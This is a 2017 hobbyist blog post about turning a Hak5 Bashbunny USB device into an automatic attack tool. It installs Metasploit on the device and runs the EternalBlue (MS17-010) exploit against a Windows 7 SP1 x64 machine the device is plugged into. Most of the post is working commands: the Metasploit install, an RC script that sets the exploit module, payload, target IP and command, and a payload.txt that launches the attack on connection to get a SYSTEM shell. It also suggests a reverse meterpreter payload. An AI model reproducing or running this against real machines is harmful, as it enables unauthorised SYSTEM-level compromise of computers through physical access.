Bashbunny with Metasploit ms17_010_eternalblue vs. Windows 7 SP1 x64

Posted on May 23, 2017 by astr0baby

I have finally got the Bashbunny from HAK5, and I can say this is really an Imperial Star Destroyer compared to the Teensy++ 2.0  A-Wing that I have used 6 years ago.

Bashbunny is capable of running Metasploit framework as it has 512 MB RAM and an ARMv7 CPU (v7l) and internal 3 GB flash storage.

Eternalblue exploit that has been ported to Metasploit framework is an ideal candidate for the Bashbunny automatic exploitation. A true hacking device :)

So lets first prepare the Bashbunny device (make sure you can ssh to the device and set internet connection sharing – setup is covered here)  (( I have done all the setup on a linux system))

We need to prepare a couple of things in order to be able to run Metasploit on the Bashbunny so here are the rough steps I have done

Make sure to set some date for TLS/SSL to work ;) 

# date -s "20170523"

Add this to /etc/apt/sources.list 
deb http://http.us.debian.org/debian/ jessie-updates main 
# apt-get update
# apt-get -y install autoconf bison build-essential curl git-core libapr1 libaprutil1 libcurl4-openssl-dev libgmp3-dev libpcap-dev libpq-dev libreadline6-dev libsqlite3-dev libssl-dev libsvn1 libtool libxml2 libxml2-dev libxslt-dev libyaml-dev locate ncurses-dev openssl wget xsel zlib1g zlib1g-dev

# curl -sSL https://get.rvm.io | bash -s stable
# source /etc/profile.d/rvm.sh 
# rvm requirements
# rvm list known
# rvm install 2.3.3
# vi /root/.bashrc 
Add at the end 
source /etc/profile/rvm.sh
rvm use 2.3.3 --default 


# mkdir /root/METASPLOIT
# cd /root/METASPLOIT/
# wget https://raw.githubusercontent.com/iam1980/metasploit-vps-installer/master/msf_vps_installer.sh
# chmod +x msf_vps_installer.sh 
# ./msf_vps_installer.sh 
# git config --global user.name "USER"
# git config --global user.email "user@example.com"
# ./msfupdate

You should be able to run Metasploit on the Bashbunny now

Now that we have a working Metasploit on the Bashbunny all that is really needed is to arm it and load the eternalblue exploit via an RC metasploit script, here is an example script eternal-cmd.rc   (Remote IP is a default that DHCPD will assign to the target system that you connect the Bashbunny to)

Check the /etc/dhcp/dhcpd.conf   range 172.16.64.10  172.16.64.12 and set to only one value range 172.16.64.64  172.16.64.64

use exploit/windows/smb/ms17_010_eternalblue
set PAYLOAD windows/x64/exec
set RHOST 172.16.64.64
set CMD cmd.exe
exploit

The above is ideal when we want to get a NT SYSTEM/AUTHORITY shell on the target Windows 7 SP1 x64 (unlocked)

If the target is locked we can use another payload such as :

(Something like windows/x64/meterpreter/reverse_https  would be ideal as we already know the the LHOST value already for the Bashbunny

So RHOST would be again 172.16.64.64 and LHOST 172.16.64.1  … This can be easily scripted via Metasploit RC script so ;)

The Metasploit RC scripts should be placed in the /root/metasploit-framework on the Bashbunny so we can call it from the PAYLOAD.TXT for the corresponding Attach Switch position .

So ideally this would look like this (switch1 or switch 2)  payload.txt

#!/bin/bash
LED SETUP 
ATTACKMODE RNDIS_ETHERNET 
#Set some current time ..... check your watch 
date -s "20170523 23:23" 
LED ATTACK 
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc & 
LED FINISH

The target Windows 7 should have an accessible SMB port 445 from the USB network that Bashbunny device create. Default Windows system has a firewall on so the attack wont work as the port is blocked. For the demonstration purpose we assume there is no firewall on ..

After a while you should get a NT AUTHORITY\ SYSTEM cmd shell pop up on your Win 7 desktop :)

This is a nmap scan after the successful Eternalblue attack on the target Windows 7

Host is up, received arp-response (0.0014s latency).
Scanned at 2017-05-23 23:09:43 for 149s
Not shown: 990 closed ports
Reason: 990 resets
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 128 Microsoft Windows 7 - 10 microsoft-ds
5357/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49156/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC

Here is a short demo (done via VirtualBox that simulates the actual Bashbunny attack)

Advertisement

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.